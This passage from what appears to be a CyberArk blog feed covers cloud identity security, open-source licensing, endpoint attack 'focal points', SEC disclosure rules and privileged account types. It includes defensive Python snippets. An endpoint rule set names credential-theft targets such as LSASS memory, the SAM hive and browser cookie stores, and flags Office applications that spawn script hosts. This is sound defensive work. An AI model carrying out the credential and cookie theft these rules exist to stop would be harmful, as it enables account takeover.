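        return "disable/remove (unused standing access)"
    if "shadow-admin" in tags:
        return "strip escalation actions; move to just-in-time elevation"
    if "full-admin" in tags:
        return "convert standing admin to zero standing permissions"
    return "none"


# Constructed sample inventory (not real accounts).
TODAY = date(2023, 9, 19)
SAMPLE = [
    Identity("ci-deployer", "role", frozenset({"s3:PutObject", "iam:PassRole"}), TODAY - timedelta(days=2)),
    Identity("legacy-svc", "user", frozenset({"ec2:*", "iam:CreateAccessKey"}), TODAY - timedelta(days=400)),
    Identity("break-glass", "user", frozenset({"*"}), None),
    Identity("reporting", "user", frozenset({"s3:GetObject"}), TODAY - timedelta(days=10)),
    Identity("platform-admin", "role", frozenset({"iam:*"}), TODAY - timedelta(days=1)),
]

if __name__ == "__main__":
    for name, tags in assess(SAMPLE, TODAY).items():
        print(f"{name:15} {', '.join(tags):22} -> {recommended_action(tags)}")
```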

2. User Experiences that Encourage Adoption

As enterprises implement new security tools, they face a familiar trade-off: traditional security controls can affect users in ways that slow down their ability to do their jobs.

Imposing security upon IT teams is one challenge, but enforcing controls on developers or DevOps is almost impossible. The cloud was built for speed, and no dev team would ever agree to be slowed down. And for that fact alone, I know that the successful adoption of security solutions is all about end user experience.

When we secure access to sensitive resources and services, we should always allow end users to use their native tools, giving them an experience with the least friction. Sometimes, we can improve their lives with small productivity enhancements, like giving them a personalized view of available systems and roles they can connect to.

Let’s look at another example of a developer adoption challenge: security teams need to ensure that secrets management practices are used to secure application credentials (non-human identities). This is why I’m proud of our capabilities that allow developers to keep using their preferred cloud-native solutions without making any changes to their application – while CyberArk secures and governs those secrets on the backend. It’s an excellent way to help ensure both developers and security teams achieve their goals.


A simplified view of a common security/usability trade-off

3. Fewer Security Tools

Now that we all agree on the importance of the end user experience for successful adoption, we should also keep in mind that admins and security teams have to use the security tools themselves. With security being top of mind, the explosion of solutions and tools is enough to give anyone a headache. Consider a cloud security architect or IAM expert who needs to fully understand and operate the myriad solutions for securing their environment. They need to manage native cloud provider tools and services (and multiply that threefold for a multi-cloud strategy) and related solutions for IGA, IDP, PAM, CIEM and secrets management. These systems must work harmoniously, feeding one another and integrating with other key systems such as ITSM and SIEM solutions. It is no wonder that a recent ESG report showed that 54% of organizations prefer a platform approach with unified controls from fewer vendors.

So maybe it’s all about running an efficient operation – using fewer tools to manage your IAM needs. This helps ensure those security solutions can be installed more easily and managed more efficiently, which is what it takes for them to succeed.


Better Together: People, Processes and Technology

Considering that no one key to a successful cloud identity security program exists, we should look beyond just pure technology, features and capabilities. Instead, we should consider the real-life challenges of implementing a large-scale, multi-cloud and multi-system environment. We should think of processes within organizations to keep developers (end users) happy. And we should provide admins with platform-based solutions to manage an efficient operation, identify IAM risks and mitigate them with an integrated solution.

Yonatan Klein is director of product management, Cloud Security at CyberArk.

Is Open Source Software Dead? https://www.cyberark.com/blog/is-open-source-software-dead/ Thu, 14 Sep 2023 19:25:25 +0000 https://www.cyberark.com/?p=182538

How Cloud and SaaS are Actively Disrupting Open Source

Open source software (OSS) has driven technological growth for decades due to its collaborative nature and ability to share information rapidly. However, major OSS security vulnerabilities like Log4j, Heartbleed, Shellshock and others have raised concerns about the security and sustainability of similar projects. At the same time, major open source-based companies have changed their OSS licenses, like MongoDB, Elastic (formerly ElasticSearch), Confluent, Redis Labs and most recently, HashiCorp.

In this blog, we’ll examine recent events and trends behind the evolution of open source software, explore its future and discuss what organizations can do to protect themselves.

Community Driven Open Source Software

The most famous early example of community-driven open source is GNU, which stands for GNU’s Not Unix. GNU is a major component of Linux, and it was born out of Richard Stallman’s frustration over not being able to modify his printer software code to provide customizations and improvements. Stallman wanted unrestricted and free (of cost) software that he could update, maintain and customize himself with other community members, so he created GNU and the GNU General Public License or GPL – one of the most popular and permissive OSS licenses – which is the inspiration behind many open source licenses and projects today.

In the example of the GNU project, it’s important to understand that the user community takes responsibility for developing, maintaining, supporting and providing security patches – the idea was never that anyone could use the software without helping to keep it going, because that isn’t sustainable. Kubernetes, Linux, Apache and CNCF projects are good examples of community-driven projects.

Vendor-Driven Open Source Software

Vendor-driven open software projects are more centralized and driven from the top down, with a single software vendor providing most of the software and maintenance. In this case, the user community may contribute some customizations, support and patches, but the bulk of the expense and burden remains with the software vendor. This use case is a go-to-market (GTM) approach that relies on converting community users to premium, paid features or services to generate revenue that will offset the costs of building and maintaining the OSS version.

Industry and Technology Trends Driving Open Source Disruption

When GPL and other permissive OSS licenses were first conceived, few envisioned the impact that cheap cloud computing resources and fast broadband would have on the OSS landscape. Now, we are seeing the ripple effects of SaaS and how it impacts vendor-driven open source projects like MongoDB, Elastic, Redis Labs and, most recently, HashiCorp, which changed its OSS licensing, angering its user community.

Several vendor-driven open source projects have had difficulty monetizing enough of their user community to offset expenses. Adding further financial pressure, the growing popularity of SaaS has inspired companies to offer SaaS solutions built from OSS versions of their competition, monetizing the work of the competition and further reducing the incentives behind vendor-driven OSS projects.

The Future of Open Source Software

Vendor-driven open source offerings are advertised as a way for users to get started. However, migrating from a self-hosted OSS solution to the enterprise version can be more complicated or expensive than initially expected, leaving users uncomfortably stuck on the open source version. At the same time, they also need the paid features. This is one area where SaaS should and will replace OSS; when a user is looking to start small and grow with a solution, there is no need for a migration path or the added expense of engineering resources to support and maintain the solution.

The future doesn’t look promising for vendor-driven OSS projects built purely for monetizing the offerings; these projects will become more restrictive and put more of their development efforts behind paid features.

As Mark Twain once said, “History never repeats itself, but it does often rhyme.” This is true when it comes to the future of open source projects, because the path forward is similar to the printer example we mentioned earlier – these projects will be primarily driven and supported by the user community. To maintain viability, community-driven OSS projects need more backing from the user community to provide the required security patches, maintenance and support. Unfortunately though, not all of these projects are supported the way they need to be, as many security vulnerabilities like Log4j, Heartbleed, Shellshock and others threaten the security and sustainability of community-driven open source projects. CISA’s recent announcement of a new OSS security roadmap underscores these concerns.

Impacted by Open Source Licensing Changes?

Are you looking to centralize human and non-human access? If your organization uses an OSS vault solution, you likely have many questions about the latest license changes and want to explore your migration journey.

If so, join us on Sept. 27 for our webinar covering the recent open source news and next steps for centralizing human and non-human identity security.

John Walsh is a senior product marketing manager at CyberArk.

CyberArk Named a Leader in the Gartner® Magic Quadrant™ for PAM for the Fifth Time https://www.cyberark.com/blog/cyberark-named-a-leader-in-the-gartner-magic-quadrant-for-pam-for-the-fifth-time/ Mon, 11 Sep 2023 15:12:23 +0000 https://www.cyberark.com/?p=182381

Today, I’m honored to share that CyberArk has been named a Leader in the “2023 Gartner® Magic Quadrant™ for Privileged Access Management.”1 This is the fifth time our company has been positioned as a Leader in this report.

Learning By Listening

CyberArk first introduced privileged access management (PAM) to the market to address a critical need to protect the users with the highest-risk access, such as IT administrators and others with unconstrained access to valuable company assets. In working alongside organizations to build proactive PAM programs – and also helping others recover from some of the largest breaches in modern history – we, to quote Ernest Hemingway, “learned a great deal from listening carefully.” These stories became the fabric of our organization, woven into the CyberArk Identity Security Platform, inspiring our strategy and uniting us in a shared mission.

We’ve continued listening and innovating ever since. Today, the landscape looks dramatically different. Employees and third-party vendors work from anywhere, on multiple devices. Any human and machine identity can be assigned high-risk permissions and become a “privileged user.” Hybrid and cloud environments are massively complex. Threats, from AI-fueled ransomware to sophisticated software supply chain attacks, are constantly growing in sophistication. And the cybersecurity industry itself is experiencing tremendous change as companies emerge, are acquired and often struggle to find their footing in a tightly crowded space.

Consistent, But Never Complacent

Through it all, CyberArk has remained an unwavering presence, delivering market-leading innovations and expertise to meet organizations’ evolving needs. Building upon our foundational PAM strengths, we’ve extended intelligent privilege controls across the entire identity lifecycle for all identities. As the only vendor positioned as a Leader in the most recent Gartner® Magic Quadrant™ reports for both PAM (2023) and Access Management (2022), we offer the world’s most advanced identity security platform, empowering organizations to drive down identity-based risks and consolidate vendors while delivering operational efficiencies and achieving a faster ROI. Like an invisible force field, the CyberArk Identity Security Platform wraps seamlessly around an organization, its devices and its people – wherever they go.

In particular, we’re proud of how we’ve innovated alongside customers to solve their cloud-first use challenges. Developers are privileged users in modern environments. Many have entitlements to provision and de-provision infrastructure and services or change existing configurations. This access must be secured, without slowing down engineering velocity. We’ve invested heavily and innovated rapidly to deliver new cloud security solutions that address common developer requirements.

Of course, the most successful cybersecurity programs aren’t just about great technology: people and processes are equally important. Our team brings unmatched insights and proven methodologies based on decades of experience in helping more than 8,000 organizations around the world. With prescriptive guidance and technical domain expertise, we deliver exceptional experiences that empower teams to execute winning strategies. And we’ve continued listening carefully, investing heavily in our customer support team to ensure system resilience and high availability of our mission-critical technologies.

There can be no complacency in cybersecurity. Active, consistent dialog and collaboration with our customers and industry partners, coupled with cutting-edge threat research, continue to inform our roadmap. We’re setting the bar with advanced capabilities that further bolster security, adoption and user experience across our platform. Some recent examples include:

  • Deepening secrets management offerings: Further enhancing our SaaS and self-hosted secrets management solutions that enable consistent control of multi-cloud environments. One noteworthy example is extending CyberArk Secrets Hub’s coverage so more security teams can tackle a thorny identity security challenge: securing and managing secrets and credentials used by machine (or non-human) identities, which outnumber human identities 45:1.
  • Securing privilege on the endpoint: Continuing to address security leaders’ No. 1 area of risk – credential theft – with advanced credential management capabilities that block threats at the endpoint. We’re especially proud of our recent security innovations for protecting Windows workstations and servers.
  • Driving progress toward zero standing privileges: Introducing new just-in-time, least privilege access capabilities that are critical for helping organizations move toward the ideal state of zero standing privileges (ZSP) in the cloud.
  • Delivering for our self-hosted customers: Our continued commitment to self-hosted customers is reflected in our latest release, which features several of our customers’ top enhancement requests.
  • Extending AI use cases: Strategically expanding our use of machine learning and AI to improve customers’ defensive capabilities to counter attacker innovation.

We also continue to invest in the fundamental PAM solutions that our customers rely on – from unveiling a simplified user interface to enhancing unified logging and reporting features that ease audit and compliance requirements. It’s no longer enough to have great privilege controls: organizations need smart processes around them as well. We’ve innovated to add lifecycle management and identity orchestration capabilities that help customers improve and simplify privileged access management.

More than ever, security requires a team game approach, and we’re fortunate to play with the very best. Together with our extraordinary global ecosystem of C3 Alliance partners, we deliver customized solutions, integrations and product enhancements to help security teams mitigate emerging risks in their environments and address evolving identity security challenges.

Today’s distinction further accelerates momentum across our business. Last month, CyberArk reported strong second quarter results that beat guidance across all metrics, underscoring the power of our platform and identity security’s foundational role in Zero Trust-based cybersecurity. We believe we have a tremendous opportunity ahead and remain focused on listening closely and executing our strategy.

We thank our incredible customers and partners for this. Your experiences, perspectives and feedback have shaped CyberArk since day one. And we celebrate our CyberArk team – the cornerstone of our business – for their focus, execution and commitment to excellence. We dedicate this milestone to all of you.

Download the Full Complimentary Report

To learn more, download the full 2023 Gartner Magic Quadrant for Privileged Access Management report.

*GARTNER is a registered trademark and service mark, and MAGIC QUADRANT is a registered trademark, of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

1 – Gartner® Magic Quadrant™ for Privileged Access Management, by Felix Gaehtgens, James Hoover, Michael Kelley, Brian Guthrie, Abhyuday Data, 5 September 2023

Barak Feldman is senior vice president of PAM and Identity Security at CyberArk.

Securing Endpoints By Applying ‘Passive Income’ Concepts https://www.cyberark.com/blog/securing-endpoints-by-applying-passive-income-concepts/ Fri, 08 Sep 2023 14:46:16 +0000 https://www.cyberark.com/?p=182329

Investing in cybersecurity is a lot like working hard to save for retirement. Your budget’s already tight, but you must secure the future. You’re faced with endless headlines and market updates that make you nervous about making the wrong choices – or not making moves quickly enough amid fast-changing conditions. Under pressure, many focus on identifying the investments (effort, time, money) that are best positioned to keep generating income for you while requiring little or no maintenance. In other words, work smart – not hard.

This makes sense in the cybersecurity world, too. You should ask yourself what passive income ideas may help you achieve your cybersecurity goals faster.

Of course, it’s easier said than done. But some nice, no-nonsense cybersecurity “investments” will continuously generate “income” through saved time, calmer nerves and fewer expended resources. Every cybersecurity professional should look for focal points – the centers of maximum risk concentration. These points show up repeatedly in all kinds of attack kill chains. Then, you need to set up rules that reduce or eliminate the attack surface around these points, so that you can keep working normally while anyone else trying to use them – for nefarious purposes or anything else – finds it extremely difficult.

Here are some focal points that you can focus (pun intended) on to break most attack chains:

Focal Point No. 3: Break Common Exploit Techniques

Many exploits take advantage of software bugs, vulnerabilities or legitimate functionality to make applications operate in ways that assist attackers. Many are relatively easy to carry out, particularly those requiring minimal user interaction. A recent example requiring little interaction is CVE-2023-36884; according to the CVE description, an attacker would need “… a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.”

Convince the victim to open the file? I mean, what could be easier? …

“Dear HR, please find my CV attached.”

All set!

Okay, so what should be the “passive income” investment here? What we need to prevent is a situation in which an application spawns another application in an elevated mode. The technique is called child and parent process control. It protects against a wide range of exploits that target PowerShell, MS Office, Adobe Acrobat and many other applications.

Focal Point No. 2: Make Your Web Browser a Secure Browser

Session hijacking has become the attacker’s weapon of choice. It’s beautiful in its simplicity. All you need to do is steal a tiny text file from the target’s machine, which can provide access to the victim’s email, documents or cloud configuration consoles. The scariest thing about session hijacking is that it bypasses all the complex user authentication systems IT puts in place, including multi-factor authentication (MFA).

The focal point here is the browser, of course. We must restrict access to the browser’s memory and cookies with privilege threat protection to prevent a successful attack. By preventing cookie stealing, we can thwart session hijacking, no matter how the attacker attempts to access session data.

This “investment” is quickly rising in importance as more and more threat actors turn to attacking browsers, considering they can gain access to critical systems and sensitive data, such as financial transaction systems, SCADA control and cloud configuration consoles, security tool web interfaces, data lakes and email systems.

Focal Point No. 1: Defend Credentials Everywhere

Another focal point that is very common in many attacks is user and administrator credentials, security tokens, passwords and password hashes. Security professionals set up IT systems in a way that scatters credentials and other bits of trust (tokens, hashes, cookies, certificates) across endpoints. If attackers can access those items, they can gain persistence, move laterally, elevate privileges and deliver impact. In a recent example, a threat actor dubbed Storm-0558, according to Microsoft, “… accesses credentials from a variety of sources, including the LSASS process memory and Security Account Manager (SAM) registry hive. … once Storm-0558 has access to the desired user credentials, the actor signs into the compromised user’s cloud email account with the valid account credentials.”

And, in yet another data breach, at least “…179,000 AWS Console credentials, 2,300 Google Cloud credentials, 64,500 DocuSign credentials, 15,500 QuickBooks credentials, 23,000 Salesforce credentials, 66,000 CRM credentials” were stolen with information stealers and listed for sale. Information stealers are a type of malware that steals data stored in applications such as web browsers, email clients, instant messengers, cryptocurrency wallets, FTP clients and gaming services – in other words, scattered across each machine in every organization, waiting to be found and stolen by attackers.

By blocking access to the various credential stores within the operating system and third-party applications, you can protect your users and endpoints from many threats, making this technique a terrific source of passive cybersecurity income. CyberArk Endpoint Privilege Manager has over 50 different rules preventing credential and security token theft, and new rules are constantly added and dynamically delivered to endpoints – for example, a new rule for workstations and servers that protects Discord, a popular communication platform, from various data theft methods and so helps prevent a data breach.

Focal Point No. 0: Abuse of User Privileges

Preventing the abuse of user privileges should be the first on the list, but we felt it could be a little repetitive for you if you read our blog regularly – hence the zero. Beating a dead horse would likely be the proverbial description, except the horse is still very much alive. While everyone seemingly agrees about this security best practice – no user should work under local admin – we still see organizations where users keep working as admins. CISA issued an advisory focused on detecting advanced persistent threat (APT) activity targeting Outlook online that recommends the following as general cloud migration guidance: “Separate administrator accounts from user accounts according to the National Institute of Standards and Technology’s (NIST’s) guidance, AC-5: Separation of Duties.” and “Only allow designated administrator accounts to be used for administration purposes. If an individual user requires administrative rights over their workstation, use a separate account without administrative access to other hosts.”

My take regarding endpoint privilege security is even more radical: No user should have local admin rights. Period. CyberArk Endpoint Privilege Manager can take care of all the necessary elevations whenever a user requires elevated privileges. And for any conceivable scenario when policies are too rigid to permit an automatic elevation, there are several ways to quickly resolve it including just-in-time (JIT) policies and offline authorization. These methods are much quicker than having a system administrator remotely connect to your machine. And if you are a local administrator, you’re taking on enormous risk because cyber incidents are bound to happen.
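As an added example (not CyberArk Endpoint Privilege Manager code, whose rules the post describes), the following Python policy check evaluates constructed endpoint events against the four focal points above: a document application spawning a script host (No. 3), a non-browser process reading a browser cookie store (No. 2), access to LSASS memory or the SAM hive by a process outside an allowlist (No. 1) and an elevated process launched from the interactive desktop shell (No. 0). The event format, process names, file paths and allowlists are assumptions.

```python
"""Evaluate endpoint events against the four 'focal point' rules.

Added example, not CyberArk Endpoint Privilege Manager code: the event
format, process names, paths and allowlists are assumptions for illustration.
"""
from dataclasses import dataclass

# Focal point 3: document-handling applications that should never launch a script host.
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Focal point 2: browser cookie stores and the browsers allowed to read them.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
COOKIE_STORE_MARKERS = ("\\network\\cookies", "cookies.sqlite")

# Focal point 1: OS credential stores and the processes permitted to touch them.
CREDENTIAL_TARGETS = {"lsass.exe"}
CREDENTIAL_HIVES = ("\\config\\sam", "\\config\\security")
CREDENTIAL_ALLOWLIST = {"lsass.exe", "csrss.exe", "services.exe", "wininit.exe", "msmpeng.exe"}


@dataclass(frozen=True)
class Event:
    kind: str               # "process_create", "process_access" or "file_read"
    process: str            # acting process image name
    target: str = ""        # child image, accessed process image, or file path
    elevated: bool = False  # the new process holds a local admin token


def evaluate(event):
    """Return (decision, rule): 'block', 'flag' or 'allow' plus the matching rule."""
    proc, target = event.process.lower(), event.target.lower()
    if event.kind == "process_create":
        if proc in DOCUMENT_APPS and target in SCRIPT_HOSTS:
            return "block", "FP3: document application spawning a script host"
        if event.elevated and proc == "explorer.exe":
            # Focal point 0: elevation straight from the desktop shell means the user
            # is working with local admin rights rather than a brokered elevation.
            return "flag", "FP0: elevated process launched from the interactive shell"
    elif event.kind == "process_access":
        if target in CREDENTIAL_TARGETS and proc not in CREDENTIAL_ALLOWLIST:
            return "block", "FP1: unauthorised access to LSASS process memory"
    elif event.kind == "file_read":
        if target.endswith(CREDENTIAL_HIVES) and proc not in CREDENTIAL_ALLOWLIST:
            return "block", "FP1: read of the SAM/SECURITY registry hive"
        if any(m in target for m in COOKIE_STORE_MARKERS) and proc not in BROWSERS:
            return "block", "FP2: non-browser read of a browser cookie store"
    return "allow", "no rule matched"


def audit(events):
    """Evaluate every event; return a list of (event, decision, rule)."""
    return [(e, *evaluate(e)) for e in events]


def summary(results):
    """Count decisions so the policy's effect on a sample is visible at a glance."""
    counts = {"block": 0, "flag": 0, "allow": 0}
    for _, decision, _ in results:
        counts[decision] += 1
    return counts


# Constructed sample events (not captured telemetry).
COOKIE_DB = r"C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"
SAMPLE_EVENTS = [
    Event("process_create", "WINWORD.EXE", target="powershell.exe"),        # FP3 -> block
    Event("process_create", "explorer.exe", target="chrome.exe"),           # normal launch
    Event("process_access", "updater.exe", target="lsass.exe"),             # FP1 -> block
    Event("process_access", "MsMpEng.exe", target="lsass.exe"),             # allowlisted AV
    Event("file_read", "backupagent.exe", target=r"C:\Windows\System32\config\SAM"),  # FP1
    Event("file_read", "chrome.exe", target=COOKIE_DB),                     # browser's own store
    Event("file_read", "svc-helper.exe", target=COOKIE_DB),                 # FP2 -> block
    Event("process_create", "explorer.exe", target="regedit.exe", elevated=True),    # FP0
]

if __name__ == "__main__":
    for event, decision, rule in audit(SAMPLE_EVENTS):
        print(f"{decision:5} {event.process:>16} -> {event.target[-30:]:30} {rule}")
    print(summary(audit(SAMPLE_EVENTS)))
```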

Breaking the Attack Kill Chain (The Easy Way)

So, there you have it. Take care of these focal points. Thankfully, it’s relatively easy to do (given the right tools) and is a set-and-forget activity – just like passive income! Once set, attacks will continuously hit a wall, considering the attackers will find themselves disarmed and toolless. We can’t promise that after reading this post, you’ll have a clear roadmap to financial independence and early retirement, but we hope you found some helpful advice here that will save you some time and maybe a grey hair or more.

Author’s note: Oh, by the way, CyberArk Endpoint Privilege Manager has these and many more threat mitigation rules as a part of QuickStart – our rapid risk reduction and least privilege framework.

Andrey Pozhogin is a senior product marketing manager at CyberArk.

5 Ways CISOs Can Prepare for SEC Cybersecurity Compliance https://www.cyberark.com/blog/5-ways-cisos-can-prepare-for-sec-cybersecurity-compliance/ Wed, 30 Aug 2023 13:01:30 +0000 https://www.cyberark.com/?p=182112

The U.S. Securities and Exchange Commission (SEC) recently announced a ruling aimed at enhancing public companies’ cybersecurity risk management, strategy, governance and incident disclosure. To sum it up, companies must report cyberattacks within four days of determining an incident is “material” and divulge details about their cybersecurity programs annually.

With this long-anticipated ruling, the SEC calls on companies to increase transparency and accountability by providing their investors with “consistent, comparable and decision-useful” information about how they manage cybersecurity risks. While some enterprises are prepared to meet time-based disclosure regulations today, many must beef up their capabilities before the SEC requirements take effect in December 2023.

SEC Cybersecurity Compliance

With the clock ticking, here are five actions CISOs and security leaders can take to prepare for SEC cybersecurity compliance and mitigate cyber risk:

1. Review your organization’s current incident response and reporting process. Having a solid playbook in place isn’t enough. It takes repetition and muscle memory to act quickly and decisively to minimize an attack’s impact. Conducting regular readiness exercises will help teams uncover technical gaps and process or communication breakdowns that could hinder timely response and disclosure.

2. Assess the threat landscape. Threat actors’ techniques change, but identity remains a constant in the attack lifecycle. According to the CyberArk 2023 Identity Security Threat Landscape Report, the number of human and machine identities is expected to balloon by 240%. Nearly half of all identities require sensitive access to perform their roles, making them appealing and plentiful targets for threat actors. And almost all (99%) security professionals expect an identity-related compromise to occur in their environment in the next year. When you consider the numbers and impact of recent major breaches, it’s clear this is no longer an identity and access management (IAM) or even a cybersecurity problem – this is a business problem. To properly manage risks to your business, you must understand where your most critical assets are, who (human identities) and what (machine identities) can access them, how these identities access them, when this happens and for how long.

3. Evaluate existing controls. As part of the SEC’s new rules, companies must add specific details about their cybersecurity programs in annual 10-K filings. Now is the time to analyze existing security controls and policies against recognized standards, such as the NIST Cybersecurity Framework or ISO/IEC 27002, to identify areas where your controls do not adequately mitigate your risk. From there, it comes down to prioritization. Most security leaders will focus on “buying back” the most risk in the shortest amount of time using the least amount of resources. Securing identities often rises to the top of prioritized lists, given the surge in human and machine identities and associated risks. With a sufficient sense of urgency, critical identity security controls (that emphasize Zero Trust and least privilege principles for monitoring and controlling access) can be implemented quickly – as is often done in the wake of actual breaches. It’s wise to focus initial steps on securing high-value targets that represent the greatest potential risk to the business.

After taking these steps, you can extend the breadth and depth of your defenses to mature your identity security strategy. If you’re looking for prescriptive guidance, check out the CyberArk Blueprint for Identity Security Success.

4. Prepare for “materiality” decision-making. As part of the SEC ruling, public companies must file a Form 8-K with the SEC within four days of determining a cyber incident is “material.” There are many factors to consider when determining the materiality of a cyber incident. Part of the CISO’s job is to rapidly assess the situation and provide relevant information (i.e., what happened, when, what was impacted, what is still unknown) to help their organization make that call. The ability to track all identities effectively, coupled with continuous threat detection and analysis, is one of the best ways to ascertain this information in a timely manner.

5. Sharpen business risk communication skills. As the organization’s cybersecurity “translator,” the CISO must communicate business risk to the Board effectively and efficiently – now even more so given time-based disclosure mandates. This means reframing technical metrics and demystifying cyber risk by using more relatable terms, such as financial or reputational impact. Explore ways to integrate cost-benefit analysis into your organization’s existing cybersecurity framework to help quantify risk and mitigation ROI for key control areas. In the meantime, continue professional development pursuits to sharpen your communications and change management skills. And actively broaden your professional network, as there may be times when you’ll need to “phone a friend” (for instance, a fellow CISO/CIO or insurance expert) to help explain the implications of a cyberattack to the Board.

Building Cyber Resilience Through Enhanced Collaboration

The SEC’s new time-based ruling is one of many government steps to push the ball forward. Yet building cyber resilience takes significant collaboration on all fronts.

At an organizational level, CISOs must get even closer to their Boards and business stakeholders. Regular conversations and relationship-building efforts are key to understanding their priorities, challenges and risk tolerance. With these insights security leaders can shape “big picture” cybersecurity programs that align to key business goals, maximize risk reduction and hold up under investor scrutiny.

In the same vein, more cooperative action across private and public sectors is needed to raise our collective defense and protect our borderless networks from evolving threats. These cybersecurity reports to the SEC should be rapidly analyzed and anonymized for distribution to the cyber defense community. If properly implemented, this SEC initiative can be used with others to help enable all of us working together to reach the vision of the former Office of the National Cyber Director: “You need to beat all of us to beat one of us.”

James Imanian is Senior Director of the U.S. Federal Technology Office at CyberArk.

]]>
3 Types of Privileged Accounts to Secure in a Transforming Enterprise https://www.cyberark.com/blog/3-types-of-privileged-accounts-to-secure-in-a-transforming-enterprise-2/ Thu, 24 Aug 2023 21:35:45 +0000 https://www.cyberark.com/?p=182052 Privileged Access

For security teams managing their enterprises’ privileged access management (PAM) programs, times have changed and what’s considered a privileged or high-risk account has drastically shifted. In turn, the way organizations not only manage privilege, but comprehensively secure it, must also shift.

Historically, organizations have managed their PAM programs by vaulting and rotating credentials on privileged accounts. Security controls are put in place for specific users, such as admins and specific accounts like a domain admin account. This approach no longer satisfies organizational needs.

According to 2,300 IT security decision-makers surveyed in the CyberArk 2023 Identity Security Threat Landscape Report, there’s a significant gap. Sixty-three percent say that the highest-sensitivity access for their organization’s employees is not adequately secured at a time when they expect both human and non-human identities to grow roughly 240% in the coming year.

Security professionals feel this way because privileged access as we know it has evolved (you can have a look at our blog post on this same subject from PAM’s 2017 scrapbook to see an earlier take on that evolution for yourself). The big change catalyst: the types of privileged accounts that need to be secured have expanded in scope and scale, as enterprises made moves to become more digital and cloud based. A fresh approach to PAM programs means understanding the wide range of accounts and their vulnerabilities.

These days there are three categories for classifying privileged accounts:

  1. System accounts
  2. Operational accounts
  3. Application accounts

All these accounts encompass human and non-human identities, each with distinct levels of privilege that require separate management to restrict the attack surface.

Visual breakdown of the three privileged account categories with examples. The three categories are: system accounts; operational accounts; and application/machine accounts.

Let’s dive into the different privileged account types organizations must secure and dynamically provision:

1) Accounts with System-level Privileged Access

System-level privileged access accounts are administrative accounts, often established by the operating system or cloud provider. These accounts possess inherent high-risk characteristics, featuring persistent privileges and predefined passwords, necessitating secure vaulting, deployment in emergency access situations and ongoing monitoring for authorized user access.

Here are a few examples of these accounts:

  • Domain administrator accounts have complete privileged access to all resources, servers and workstations within the domain. The domain admin is the most powerful account in the domain; it is created automatically on the first domain controller when Active Directory is installed.
  • Linux root accounts have unlimited access to all programs, files and resources on a designated Linux system, VM or cloud instance running Linux services.
  • AWS root accounts are the first identity created by default in a cloud service provider (CSP), and all CSPs have some root account. They control everything in the instance and are a prime target for bad actors. It’s best practice to vault these accounts and never use them for day-to-day tasks. Instead, keeping the AWS example, create an AWS IAM user account with varying privileges to adhere to the principle of least privilege (PoLP). You can replace the accounts with federated identities and grant permissions using zero standing privilege (ZSP) platforms.
  • Azure Active Directory (AAD) global admin accounts are like AWS root accounts – they are the most-privileged accounts tied to your Azure tenant. Avoid using these accounts for day-to-day tasks; instead, vault and centrally manage them using a PAM solution.
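The AWS root guidance above (vault the root account, never use it for day-to-day work) is something you can verify from CloudTrail. The following is an added example, not code from the original post: it classifies constructed CloudTrail-shaped records and flags root activity, with root console sign-ins lacking MFA ranked highest. The account ID, IP addresses and user names are placeholders.

```python
"""Spot day-to-day use of the AWS root account in CloudTrail records.

Added example (not from the original post). The records below are
constructed samples in CloudTrail's JSON record shape; userIdentity.type,
eventName and additionalEventData.MFAUsed are real CloudTrail field names,
while the account ID, IPs and user names are placeholders.
"""
from collections import Counter
from typing import Dict, List, Optional

SAMPLE_EVENTS: List[Dict] = [
    # Root signs in to the console without MFA: break-glass at best, compromise at worst.
    {"eventTime": "2023-08-24T10:00:00Z", "eventName": "ConsoleLogin",
     "eventSource": "signin.amazonaws.com", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "Root", "arn": "arn:aws:iam::111122223333:root"},
     "additionalEventData": {"MFAUsed": "No"}},
    # Root used for routine work that an IAM user or role should be doing.
    {"eventTime": "2023-08-24T10:04:12Z", "eventName": "CreateBucket",
     "eventSource": "s3.amazonaws.com", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "Root", "arn": "arn:aws:iam::111122223333:root"}},
    # IAM user making an ordinary API call: expected, no finding.
    {"eventTime": "2023-08-24T10:10:00Z", "eventName": "ListBuckets",
     "eventSource": "s3.amazonaws.com", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "alice"}},
    # IAM user console login without MFA: weaker than it should be, but not root.
    {"eventTime": "2023-08-24T10:12:00Z", "eventName": "ConsoleLogin",
     "eventSource": "signin.amazonaws.com", "sourceIPAddress": "198.51.100.9",
     "userIdentity": {"type": "IAMUser", "userName": "carol"},
     "additionalEventData": {"MFAUsed": "No"}},
]


def classify(event: Dict) -> Optional[str]:
    """Severity for an event that breaks the 'vault root, never use it
    day-to-day' practice, or None when the event is unremarkable."""
    ident = event.get("userIdentity", {})
    name = event.get("eventName", "")
    mfa_used = event.get("additionalEventData", {}).get("MFAUsed") == "Yes"
    if ident.get("type") == "Root":
        if name == "ConsoleLogin" and not mfa_used:
            return "critical"  # root session with no second factor
        return "high"          # any other root activity is day-to-day use of root
    if name == "ConsoleLogin" and not mfa_used:
        return "medium"        # non-root, but still a password-only session
    return None


def audit_events(events: List[Dict]) -> List[Dict]:
    """Return one finding per flagged event, in input order."""
    findings = []
    for ev in events:
        sev = classify(ev)
        if sev is None:
            continue
        ident = ev.get("userIdentity", {})
        findings.append({
            "severity": sev,
            "time": ev.get("eventTime"),
            "actor": ident.get("userName") or ident.get("arn") or ident.get("type"),
            "event": ev.get("eventName"),
            "source_ip": ev.get("sourceIPAddress"),
        })
    return findings


def severity_counts(findings: List[Dict]) -> Dict[str, int]:
    """Counts per severity, handy for a daily summary or a dashboard tile."""
    return dict(Counter(f["severity"] for f in findings))


if __name__ == "__main__":
    results = audit_events(SAMPLE_EVENTS)
    for f in results:
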